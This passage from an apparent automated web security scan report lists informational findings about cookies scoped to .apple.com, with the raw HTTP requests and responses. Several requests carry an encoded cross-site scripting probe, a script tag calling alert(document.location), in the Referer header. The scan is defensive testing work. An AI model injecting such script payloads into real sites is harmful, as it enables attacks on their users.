Set-Cookie: ccl=XqG24RKHiB3KpZrwS31AIT/E4Q0vvokPyR0Q0jStmM3MNmh8FcxhQM6VXsEXg4CZ6nF5NN8C6ez+JxhEEfuJyLXihr3cN80waGouuki0UrqjcxlKbUtxl8eidcsQAeG8BXEi6mkyhAaOf72yr9luI+vdfzfQ/Bo1CNE+i3SWJJiy56nPmFjGFsePEoSTPOG+bJCLKqwLRW/1Fd5xyQjWptxhL9uBv2XFCjKDg0Pu2hO7gQjD6ysCAJM3qYTQWH4pZ//82ogWBRgTZrBwLwFs9GRubDUERaR2F+4iQLL4rnUgUBlpNh7guqotbh6g8ifxm5zNu97KG4zZ6vZBeWJmuCdNfYzPeEoJsZyAORrxqANJlqUNewm81R987stPeXkZv4nFLSFTcS2AC/Mno5+uXmRy1gYLkeCbHCfawurIgyOafvcxnRZBHgkGFS23YeYiofWcTPAZeaAsu37YAIcSpzx31YwwfaV3baJdWKQ6pi3EEHT7yRFpajDy9M6h06cKNcWy6pVJxcFmU8SrKB0Y3v5Ym7WKE0XUbzBHx+uJOg29fzmBsAqQzjCvsPAieBOa; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.87. http://images.apple.com/global/scripts/content_swap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/content_swap.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=38kPq7Obg7hj3EcO8NV+iPwuCIfL/YIABmCQzt6idGqWtpgBpd3yyenso9BIdpe2S4+0DTabJ/hUJzf+n+mgcvjeQ3VHN0jesPt3/8KsJib2yytp6UvDVSgf8Z4cOZxGkIEPbD0y3pbn6wRZwwBLuaMjm5aravqXDkWqH3Hqrp5LDM29N//ap+0zkEoEQ/75yaQIdCawUD0ime98CB2tFnC3TN2oxHDO2FAwql7UDJ5Sw646Wn8m6/6xWQa2qUI5aYycJk2urhuKaD/epybRLiC/zRGfP+SswiqiOxRtlcD74yZG2WTEzct1JxmTcjQy+ZPjJWqMYZdcS+UG3PCNytcZhTGSem0MvcLnfdcpk3/IXTRL7fEAulcAK7AepSR+XSNgaFU6aFLGAOeY9QHeOVhvLjRW/QsKDp6fNJJi1mYbotDWNhUqQ7Gp+F+icUxDETUvJDHSdM0UkvuDLWgDfhNe+kBATYHSCXWgTQSSrd+V7/r/HLuDu6oodVGokdaaSmUQH2xGJLEFvoToziOgz6K6lR48Cd0Ksdhwkq+EyGfbLenoY26i2wf54doeq1gP; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/content_swap.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec29f000149b

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 18 Nov 2008 01:42:58 GMT
ETag: "864-45becd0a92c80"
Vary: Accept-Encoding
Server: Apache/2.2.3 (Oracle)
X-Cache-TTL: 600
X-Cached-Time: Fri, 08 Apr 2011 23:36:46 GMT
nnCoection: close
Cneonction: close
ntCoent-Length: 2148
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: max-age=318
Expires: Thu, 21 Jul 2011 20:45:12 GMT
Date: Thu, 21 Jul 2011 20:39:54 GMT
Connection: close
Set-Cookie: ccl=38kPq7Obg7hj3EcO8NV+iPwuCIfL/YIABmCQzt6idGqWtpgBpd3yyenso9BIdpe2S4+0DTabJ/hUJzf+n+mgcvjeQ3VHN0jesPt3/8KsJib2yytp6UvDVSgf8Z4cOZxGkIEPbD0y3pbn6wRZwwBLuaMjm5aravqXDkWqH3Hqrp5LDM29N//ap+0zkEoEQ/75yaQIdCawUD0ime98CB2tFnC3TN2oxHDO2FAwql7UDJ5Sw646Wn8m6/6xWQa2qUI5aYycJk2urhuKaD/epybRLiC/zRGfP+SswiqiOxRtlcD74yZG2WTEzct1JxmTcjQy+ZPjJWqMYZdcS+UG3PCNytcZhTGSem0MvcLnfdcpk3/IXTRL7fEAulcAK7AepSR+XSNgaFU6aFLGAOeY9QHeOVhvLjRW/QsKDp6fNJJi1mYbotDWNhUqQ7Gp+F+icUxDETUvJDHSdM0UkvuDLWgDfhNe+kBATYHSCXWgTQSSrd+V7/r/HLuDu6oodVGokdaaSmUQH2xGJLEFvoToziOgz6K6lR48Cd0Ksdhwkq+EyGfbLenoY26i2wf54doeq1gP; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

/**
* This script swaps content based on classes. This script adds the 'active' class
* to selectors and content sections. Be sure to have the appropriate CSS for
* the 'active' class. Call this sc
...[SNIP]...

10.88. http://images.apple.com/global/scripts/lib/event_mixins.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/event_mixins.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=MqNfKdfUxnHaugTWYvweLP0Dkj+Nvys7qv+ZWMXUQm8HnpbtTAlXqX+8InJIUMKfuacZciKXabjPs6+XoKh3NeZDjUC75OjiyrNKRg//HjEqBK4FPZflkewt6xuiKv2CX44o/sE58txVoWiB6xd502lVxiYAJIm+D03M35cdwPm1tGVuBMajZwgcGroyVLqxfnwETXcrnWXEHbHhqnKWGujeQP6DOlhBzYBUZ5rpqBXf6rn+M4adZAu8TeKsffgINmTv1TkCK1jsKS+Co8S7B7eZkC527mRN3bYupQN+EV3dR/ekSgaqBw3NSAAoTHClZLOU3Q83KGNr224ShqRDrHyakp1Pr9RA0gaWHJRD7C5cQ2Tj00s2UzHQy2o7Jm6bStQjZvBoEDVgDwl41htriBmeui/kNDlGCoO+6YkAlQbXYDtRQ1irq3Cng2fe4LTrxHxYLelQserOwPx5+AhuylH1LHG7piVpIGBUmCeP0K5o/71PHDPnentJQrl3Q4aDieEgxnQ31vspDec2OQgHgKIDDrcA+t3snK7HusYctUuJCx+UcIbuRkHzLf5zZQjo; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/event_mixins.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec29f000149b

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 11 Jul 2008 11:54:18 GMT
ETag: "1fc2-451be3396ce80"
Vary: Accept-Encoding
X-Serial: 199
X-Check-Cacheable: YES
Server: Apache/2.2.14 (Unix)
X-Cache-TTL: 600
X-Cached-Time: Wed, 27 Apr 2011 12:41:43 GMT
Cneonction: close
nnCoection: close
Cteonnt-Length: 8130
Content-Type: application/x-javascript
Content-Length: 8130
Cache-Control: max-age=572
Expires: Thu, 21 Jul 2011 20:49:26 GMT
Date: Thu, 21 Jul 2011 20:39:54 GMT
Connection: close
Set-Cookie: ccl=MqNfKdfUxnHaugTWYvweLP0Dkj+Nvys7qv+ZWMXUQm8HnpbtTAlXqX+8InJIUMKfuacZciKXabjPs6+XoKh3NeZDjUC75OjiyrNKRg//HjEqBK4FPZflkewt6xuiKv2CX44o/sE58txVoWiB6xd502lVxiYAJIm+D03M35cdwPm1tGVuBMajZwgcGroyVLqxfnwETXcrnWXEHbHhqnKWGujeQP6DOlhBzYBUZ5rpqBXf6rn+M4adZAu8TeKsffgINmTv1TkCK1jsKS+Co8S7B7eZkC527mRN3bYupQN+EV3dR/ekSgaqBw3NSAAoTHClZLOU3Q83KGNr224ShqRDrHyakp1Pr9RA0gaWHJRD7C5cQ2Tj00s2UzHQy2o7Jm6bStQjZvBoEDVgDwl41htriBmeui/kNDlGCoO+6YkAlQbXYDtRQ1irq3Cng2fe4LTrxHxYLelQserOwPx5+AhuylH1LHG7piVpIGBUmCeP0K5o/71PHDPnentJQrl3Q4aDieEgxnQ31vspDec2OQgHgKIDDrcA+t3snK7HusYctUuJCx+UcIbuRkHzLf5zZQjo; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

/**
* Event Mixins
* (c) 2006 Seth Dillingham <seth.dillingham@gmail.com>
*
* This software is hereby released into the public domain. Do with it as
* you please, but with the understand
...[SNIP]...

10.89. http://images.apple.com/global/scripts/lib/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/prototype.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=U2CNK85JNj94QtkGAOJJcLYU6aotDUT8/VnNYZa8mKq0Uy3bWbHsLeLUk+noEHEoOgW2zrUHSJKsdpHu0XMaiOY2l/M3UW5t7hMvBHlagy+65saoFHlEQuTH/D60OMDZfgwQWSyJ0isaMPjwSXNtJVNDIjXhbr/ZycWJbuSNIQLSAet8oyHgVKAZmx3tJhkMo6WWQgYGaqhpAWOoiC4SDvilGaUof7WEpfQC4MPq17rbgnD+ycV7EX7NOpVxlXExnMrjWj0i6PDKa0MUd7JtV7qI3FFiG1YhW69Sc70Xeg0d4VVhYP9FEmjw/qgK3F5EswIFV/oCEowS6Ua8ZQlc7ckxt83UZYPx5NTDlq/tXtJBIwqke3rRpj6UKJtV+v/MozGrcMOoh/sapTfpmF8ZGb2vlM9+bwnSgp9OK7D6iWfyLB5fdTq3DPwL2e3rHLkm3ECcxgTtUuyHoPru/k72JYXx7G1vDazMFjy10FioDn/nZ2MVZjUujhEPNSUtll2nb652l3QwWb9gQ9JAumY7XBg/JB0JwTMw3hqwECNFOLWyGTc6NJUZT4Ytyb715ZVk; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/prototype.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3B
If-None-Match: "27df1-49fbc451c6740"
If-Modified-Since: Thu, 31 Mar 2011 00:21:09 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Mar 2011 00:21:09 GMT
ETag: "27df1-49fbc451c6740"
Cache-Control: max-age=568
Expires: Thu, 21 Jul 2011 20:34:27 GMT
Date: Thu, 21 Jul 2011 20:24:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=U2CNK85JNj94QtkGAOJJcLYU6aotDUT8/VnNYZa8mKq0Uy3bWbHsLeLUk+noEHEoOgW2zrUHSJKsdpHu0XMaiOY2l/M3UW5t7hMvBHlagy+65saoFHlEQuTH/D60OMDZfgwQWSyJ0isaMPjwSXNtJVNDIjXhbr/ZycWJbuSNIQLSAet8oyHgVKAZmx3tJhkMo6WWQgYGaqhpAWOoiC4SDvilGaUof7WEpfQC4MPq17rbgnD+ycV7EX7NOpVxlXExnMrjWj0i6PDKa0MUd7JtV7qI3FFiG1YhW69Sc70Xeg0d4VVhYP9FEmjw/qgK3F5EswIFV/oCEowS6Ua8ZQlc7ckxt83UZYPx5NTDlq/tXtJBIwqke3rRpj6UKJtV+v/MozGrcMOoh/sapTfpmF8ZGb2vlM9+bwnSgp9OK7D6iWfyLB5fdTq3DPwL2e3rHLkm3ECcxgTtUuyHoPru/k72JYXx7G1vDazMFjy10FioDn/nZ2MVZjUujhEPNSUtll2nb652l3QwWb9gQ9JAumY7XBg/JB0JwTMw3hqwECNFOLWyGTc6NJUZT4Ytyb715ZVk; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.90. http://images.apple.com/global/scripts/lib/scriptaculous.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/scriptaculous.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=5tsYVJ7cmasQfcp7422EF2RMK52d23uaTxp8NJCDi1GIMLhyGot+j2/pISgaWY7pillK5xJdZjm5DvCQ84+h7I9TE8hpoQb2j6giFHX9m2+TiiU/RtilVWHLYpk+Pl0yJOoP5NdE1aZyQnmxgdw+g3oEnOdHO96c76vKcwcRBWHAGtCwye3FEAp+m2JmQblnVmYcNfIA1mY5WtRBkbBiCRYJZtXEjHDMVvIEGj5gPvJWrlxxL7vWUivEfmgsfUfCTghrfVf3molhY4Ygucag8oI1xju0QZMIOQ1zDMl34cYku5Y+LOw95M+KcGj7zJfZZvMJweMGqBppApy2gbPARsIuoaGbxQNhq1cglJUic3P1zwQsrhMvPViRC4hgs4buQ6DBL5zVNUHlb1+BOqtc8yz450geLyHqV4YyuMg+1FA7kG51hLhO05PO6Nyut4voY4n9YLnEi3r7byI75pelAxcVeMfkOhDX1rQ6ef4v4YjSPppoamzUVzAyndDt5dbS/4bjGvilpP7C3O9fsdy1HGUzp8SM3vJHDO7nLtSyCSQ7TaUQmWOYErH4d24zBymY; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/scriptaculous.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3B
If-None-Match: "1cf46-44d159ddcfc40"
If-Modified-Since: Tue, 13 May 2008 05:05:45 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Tue, 13 May 2008 05:05:45 GMT
ETag: "1cf46-44d159ddcfc40"
Cache-Control: max-age=300
Expires: Thu, 21 Jul 2011 20:29:59 GMT
Date: Thu, 21 Jul 2011 20:24:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=5tsYVJ7cmasQfcp7422EF2RMK52d23uaTxp8NJCDi1GIMLhyGot+j2/pISgaWY7pillK5xJdZjm5DvCQ84+h7I9TE8hpoQb2j6giFHX9m2+TiiU/RtilVWHLYpk+Pl0yJOoP5NdE1aZyQnmxgdw+g3oEnOdHO96c76vKcwcRBWHAGtCwye3FEAp+m2JmQblnVmYcNfIA1mY5WtRBkbBiCRYJZtXEjHDMVvIEGj5gPvJWrlxxL7vWUivEfmgsfUfCTghrfVf3molhY4Ygucag8oI1xju0QZMIOQ1zDMl34cYku5Y+LOw95M+KcGj7zJfZZvMJweMGqBppApy2gbPARsIuoaGbxQNhq1cglJUic3P1zwQsrhMvPViRC4hgs4buQ6DBL5zVNUHlb1+BOqtc8yz450geLyHqV4YyuMg+1FA7kG51hLhO05PO6Nyut4voY4n9YLnEi3r7byI75pelAxcVeMfkOhDX1rQ6ef4v4YjSPppoamzUVzAyndDt5dbS/4bjGvilpP7C3O9fsdy1HGUzp8SM3vJHDO7nLtSyCSQ7TaUQmWOYErH4d24zBymY; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.91. http://images.apple.com/global/scripts/overlay_panel.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/overlay_panel.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=BXVOOROra1Qz8RH4SfKdyZSoRDyNXNczFrNQEITI5G6UvaLpZ0p+vF3VNpmMUNj5QGZ8AI/Q/wVF7JEJW1OX6FdRn/XLLbE4NtlZC0vKcr+CzMsNv7GtRfs89g6dTjb7lG87e8deXDtNL/E/UFF4Ef0YFPD1kfT6hNGpeas4TBBnmQmPzwLFVdZ8hXfAhau15uosfupfkZ9V4lBvUAC06TFuz56w9/vNdeUyYJi9wAGPclO3PSFU0rpuPPBq0z/G6SK47lBNs5Fi2wTWXvyOAYMeNEN/nwX5vk3oqhsJwU/bRUApJgiuR8aTes6wTP1DmTRKw+M0mYIniXhQ0PrLRpj5IfnduQ3TZ70w/fAoAFZlsBcpjd9xHgE+K3dsNsIGoCEUmFlbsKVq4MzXWO0ZFXOrokbODXStD7nJwMRgbpbH87aTVy+x4BoG2tP7QlT0/X92YEsJ528fWvhkduRh5dwJCrOZc92YETK8307CxoFd5rSEuMBEPgaSuSaBmpyyVxbkuzGbMyp++GC4PQ/OaO6ek8SVoSTjTzrbS/P3xZ5K+Hmp01qQIkljkEpxNP5l; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/overlay_panel.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec29f000149b

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 30 Mar 2011 22:24:08 GMT
ETag: "2be4-49fbaa2a07200"
Vary: Accept-Encoding
X-Serial: 199
X-Check-Cacheable: YES
Server: Apache/2.2.3 (Oracle)
X-Cached-Time: Mon, 04 Apr 2011 12:22:17 GMT
Cneonction: close
X-Cache-TTL: 600
nnCoection: close
Cteonnt-Length: 11236
Content-Type: application/x-javascript
Content-Length: 11236
Cache-Control: max-age=460
Expires: Thu, 21 Jul 2011 20:47:34 GMT
Date: Thu, 21 Jul 2011 20:39:54 GMT
Connection: close
Set-Cookie: ccl=BXVOOROra1Qz8RH4SfKdyZSoRDyNXNczFrNQEITI5G6UvaLpZ0p+vF3VNpmMUNj5QGZ8AI/Q/wVF7JEJW1OX6FdRn/XLLbE4NtlZC0vKcr+CzMsNv7GtRfs89g6dTjb7lG87e8deXDtNL/E/UFF4Ef0YFPD1kfT6hNGpeas4TBBnmQmPzwLFVdZ8hXfAhau15uosfupfkZ9V4lBvUAC06TFuz56w9/vNdeUyYJi9wAGPclO3PSFU0rpuPPBq0z/G6SK47lBNs5Fi2wTWXvyOAYMeNEN/nwX5vk3oqhsJwU/bRUApJgiuR8aTes6wTP1DmTRKw+M0mYIniXhQ0PrLRpj5IfnduQ3TZ70w/fAoAFZlsBcpjd9xHgE+K3dsNsIGoCEUmFlbsKVq4MzXWO0ZFXOrokbODXStD7nJwMRgbpbH87aTVy+x4BoG2tP7QlT0/X92YEsJ528fWvhkduRh5dwJCrOZc92YETK8307CxoFd5rSEuMBEPgaSuSaBmpyyVxbkuzGbMyp++GC4PQ/OaO6ek8SVoSTjTzrbS/P3xZ5K+Hmp01qQIkljkEpxNP5l; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

AC.OverlayPanel=Class.create();Object.extend(AC.OverlayPanel.prototype,AC.ViewMaster.Viewer.prototype);
Object.extend(AC.OverlayPanel.prototype,Event.Listener);Object.extend(AC.OverlayPanel.prototype,
...[SNIP]...

10.92. http://images.apple.com/global/scripts/promomanager.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/promomanager.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=b6Stj++nm2s6TmynjMSWZgABRXNpmPrdHeAwju92SofnOz/DkuCyRPZUGm/8QCxQttaFjEg2ZwfQ0xLAF4F6LG7HMa15T1P73JozupIGAor4YeflX0stvrEW4fPWXBxFDUO9H+tuJgXeHOgKNsQA2EJjYlO7VQelIyFnN3qi3oAzEDjPbW4fsBsc4ssCjpjSaCFgU9SAlfUsjpFYMhIYudI0AKctmPvKqMiEpmTypsnCV9sx+Jk5P/Osir+4uLjszfJmMC33MisT4I21QCYk7x9jC06npr9Bi6XsFAs8A6ks/GWO4nKpikBF67tA0Br1AEK/pmtFf+fAPCAiajgSwumjFl9o83Tlg47EN90c7Fz74qB6tUYIwMlGdq4AUWNymcUL9CLCPP5EaSq9bSg7kF3eFbUoH3N8XF1Yw0OQBQs/M03ilUEmIPLhSKYAGYJtOBcOlZUq8HFLuSk5NzHzWdkABX1AJ2s/qANgIpm3k+YgpbMxCb6F/6Ra7IDkDvuyjcvWs80Lw+kn/o0wSX1HAH//Jnx4wd7pLNyTGQqbbVq1cgAh2zWqZrQsq+EG4teZ; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/promomanager.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3B
If-None-Match: "cc0-4a4e72621e9c0"
If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sat, 04 Jun 2011 18:36:31 GMT
ETag: "cc0-4a4e72621e9c0"
Cache-Control: max-age=348
Expires: Thu, 21 Jul 2011 20:30:47 GMT
Date: Thu, 21 Jul 2011 20:24:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=b6Stj++nm2s6TmynjMSWZgABRXNpmPrdHeAwju92SofnOz/DkuCyRPZUGm/8QCxQttaFjEg2ZwfQ0xLAF4F6LG7HMa15T1P73JozupIGAor4YeflX0stvrEW4fPWXBxFDUO9H+tuJgXeHOgKNsQA2EJjYlO7VQelIyFnN3qi3oAzEDjPbW4fsBsc4ssCjpjSaCFgU9SAlfUsjpFYMhIYudI0AKctmPvKqMiEpmTypsnCV9sx+Jk5P/Osir+4uLjszfJmMC33MisT4I21QCYk7x9jC06npr9Bi6XsFAs8A6ks/GWO4nKpikBF67tA0Br1AEK/pmtFf+fAPCAiajgSwumjFl9o83Tlg47EN90c7Fz74qB6tUYIwMlGdq4AUWNymcUL9CLCPP5EaSq9bSg7kF3eFbUoH3N8XF1Yw0OQBQs/M03ilUEmIPLhSKYAGYJtOBcOlZUq8HFLuSk5NzHzWdkABX1AJ2s/qANgIpm3k+YgpbMxCb6F/6Ra7IDkDvuyjcvWs80Lw+kn/o0wSX1HAH//Jnx4wd7pLNyTGQqbbVq1cgAh2zWqZrQsq+EG4teZ; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.93. http://images.apple.com/global/scripts/search_decorator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/search_decorator.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=Ezx1Pkt3abA8NdS1czF+LqquA3OuoHceeKsm/ZvVkOd6+SwlkwcU1h6evC+MH8jMKdJzxj8LVTQSs4MARUcwhm5iv2kqgpVN0VYmDLdUBoGitlq1D+bvTLKATmqdgOg3NWCFMByIEWdvoIcWdlK3N35TM9bpxza5M7EoPFTfTElRo6cucID3wdp4k8SYf70eeqCPBuv9w8Q97hm+2PKuwEOLQHSBUwvinfkcX2Fy9CH0JW14l8jhda2D0e6IDuIvBtrGBVRS5/L7kFK2tBS08+/0yvnQi2Ak7kcbE0LTNZ7og5u0m+plwqwKQDpFCkgVh5wMRGBFferRpm5YjN5B38dMWymTjcU2JUFWF2wwckqlv6hJ3WkFmUEYDFyA42xAQpdghOglJvDBmc4fhks8EFwhAgEGCzzEZowKGbobFWxKprQz/rB2Apfms1aUA5xf44r1YzaBA/ObfRpSvVID65ZawD/P63VeTzfFE4Px+9GrP5XkCDAgD3ue36fdNwpiHFA5cJiXTKw8PlOt0RX52uutKNLpn7oHk2uOynAHESbYN8s6ZNo9mV4GsbgaiTra; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/search_decorator.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
